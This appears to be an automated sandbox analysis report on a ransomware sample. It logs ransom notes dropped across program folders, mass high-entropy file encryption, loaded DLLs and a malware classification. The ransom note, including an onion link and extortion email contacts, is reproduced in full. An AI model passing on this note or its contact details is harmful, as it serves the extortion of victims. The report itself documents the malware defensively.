Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/090dae0911510e32b66acf1f2681d7614ecb5da387ea4f0613237d4f134a630for email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hu-hu\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/090dae0911510e32b66acf1f2681d7614ecb5da387ea4f0613237d4f134a630for email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ro-ro\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/090dae0911510e32b66acf1f2681d7614ecb5da387ea4f0613237d4f134a630for email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\it-it\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/090dae0911510e32b66acf1f2681d7614ecb5da387ea4f0613237d4f134a630for email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/090dae0911510e32b66acf1f2681d7614ecb5da387ea4f0613237d4f134a630for email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hu-hu\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/090dae0911510e32b66acf1f2681d7614ecb5da387ea4f0613237d4f134a630for email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\it-it\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/090dae0911510e32b66acf1f2681d7614ecb5da387ea4f0613237d4f134a630for email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ja-jp\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/090dae0911510e32b66acf1f2681d7614ecb5da387ea4f0613237d4f134a630for email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)	Jump to dropped file

Writes many files with high entropy

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\yNwdh0ra_6sDoSuCVMI8Wjl58UM.br[1].js entropy: 7.9978762709	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\tIa_X3QDXj2Izj2HpQ_Mo9f1WiM.br[1].js entropy: 7.99842504441	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\uANxnX_BheDjd2-cdR8N9DEWlds[1].css entropy: 7.9900291193	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\5_KhThI0onehz_-3sl58j0dOeLI.br[1].js entropy: 7.99857823986	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\-U2ww19iycr3M_DiD25JdVUDdqk.br[1].js entropy: 7.9979497904	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe entropy: 7.99993521137	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js entropy: 7.99646421117	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js entropy: 7.99816390704	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\EJz06avERkAqfuwcXY6H5w8dtNc[1].css entropy: 7.99951327233	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js entropy: 7.99842642725	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\dYw9trBOUuy7sL9xTZGIliMEagg[1].css entropy: 7.99936468211	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\D_0mE1U1YmZvpLaz5wDHB6P-DAI.br[1].js entropy: 7.99897986371	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\k0oGmqG3Bk5KfPcZl898MPlQ1rI.br[1].js entropy: 7.9996463892	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\KF9j9oJUfaaKiX-84yf0U337ge8.br[1].js entropy: 7.9998813783	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\H3gIahXaXkGgvztu9ouLmJNXhQM.br[1].js entropy: 7.99890421067	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\JClcsxanpxBiLGzKZtauWAccdA0.br[1].js entropy: 7.99554568535	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230172v1.xml entropy: 7.99445283688	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230170v1.xml entropy: 7.99227591877	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\Kwh038ybdvX_puLwdopqHydJtVM.br[1].js entropy: 7.99964817025	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\mb8fkd60iW7q4wvyDIlCm9OOn10.br[1].js entropy: 7.99541369081	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{97b27011-f8cc-4ac9-9531-d6ee8ce92324}\Settings.index entropy: 7.99989680076	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903167889885.txt entropy: 7.99842690248	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408907975188232.txt entropy: 7.99864251495	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903214673664.txt entropy: 7.99824604201	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408904996229952.txt entropy: 7.99847304515	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906620712704.txt entropy: 7.99819879979	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906321630689.txt entropy: 7.99825211932	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133752042176283960.txt entropy: 7.99574794242	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408945595381412.txt entropy: 7.99839938768	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408908224609935.txt entropy: 7.99852324099	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt entropy: 7.99978801518	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat entropy: 7.9953236215	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json entropy: 7.99880981466	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\USOPrivate\UpdateStore\store.db entropy: 7.99998556993	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat entropy: 7.99559297451	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\User Account Pictures\guest.bmp entropy: 7.99966379407	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl entropy: 7.99721671406	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl entropy: 7.99730426217	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\User Account Pictures\user.bmp entropy: 7.99969030808	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxStore.hxd entropy: 7.99995327243	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10032023-114538-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99474846336	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10032023-100634-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99149983088	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10032023-120948-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99093037536	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10032023-125203-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99158816282	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10032023-125739-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99451687888	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-092906-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99273126711	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-093652-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99676097591	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-100200-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99345417218	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-115204-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99402959025	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230172v1.xml entropy: 7.99426093081	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230170v1.xml entropy: 7.99224418314	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe entropy: 7.99974376126	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\onra7PQl9o5bYT2lASI1BE4DDEs[1].css entropy: 7.99747619061	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\pwoaMbzGzgAZN6Xp7f9HbnqMX2U.br[1].js entropy: 7.9991825259	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\MgSq5EEOyYvlI1qVlLOXfgRHmzM.br[1].js entropy: 7.99801400509	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\uANxnX_BheDjd2-cdR8N9DEWlds[1].css entropy: 7.99195544554	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\tIa_X3QDXj2Izj2HpQ_Mo9f1WiM.br[1].js entropy: 7.99860213198	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\yNwdh0ra_6sDoSuCVMI8Wjl58UM.br[1].js entropy: 7.99798501655	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\wokAADULDNIRJUcpGmEjmH9QAB0.br[1].js entropy: 7.99931019029	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\WW0M_5fDR45SN9SlY4dEOUOMAp4.br[1].js entropy: 7.99940770176	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\26\YfXD9vOw8__a60l-k1HNCxSbem4.br[1].js entropy: 7.9973672223	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\0RHMTU26\X6j0qPgNij1n_IogMJrgYaT9Kp8[1].js entropy: 7.9906375719	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\GD6U2PFC\th[2].png entropy: 7.99174109967	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\YS1WTI6U\th[2].png entropy: 7.99006838419	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\GD6U2PFC\X4wIjRXDbKeGz0mzi-NAovdjKMM.br[1].js entropy: 7.9974026997	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\MSIMGSIZ.DAT entropy: 7.99623786426	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\YS1WTI6U\6hU_LneafI_NFLeDvM367ebFaKQ[1].js entropy: 7.99213944933	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\YS1WTI6U\th[1].png entropy: 7.99033533818	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\ZKZSJZ8L\N3OfT2wzpD1_lG-2MZjJBjlbL-U[1].js entropy: 7.99649954211	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\ZKZSJZ8L\th[2].png entropy: 7.99107002587	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db.session64 entropy: 7.99709030202	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\User Account Pictures\guest.bmp.rox (copy) entropy: 7.99966379407	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-114538-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99474846336	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\User Account Pictures\user.bmp.rox (copy) entropy: 7.99969030808	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-100634-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99149983088	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-120948-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99093037536	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-125203-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99158816282	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-125739-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99451687888	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-092906-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99273126711	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-100200-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99345417218	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-115204-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99402959025	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-093652-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99676097591	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\USOPrivate\UpdateStore\store.db.rox (copy) entropy: 7.99998556993	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe.rox (copy) entropy: 7.99974376126	Jump to dropped file

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

Process Stats: CPU usage > 49%

Source: classification engine

Classification label: mal84.rans.spre.spyw.evad.winEXE@1/1313@1/2

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

File created: C:\Program Files\7-Zip\Lang\RECOVERY INFO.txt

Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

File created: C:\Documents and Settings\user\Local Settings\Temp\acrobat_sbx\NGL\RECOVERY INFO.txt

Jump to behavior

Source: 2b7cu0KwZl.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

File read: C:\ProgramData\Microsoft OneDrive\setup\refcount.ini

Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 2b7cu0KwZl.exe

ReversingLabs: Detection: 47%

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: userenv.dll	Jump to behavior
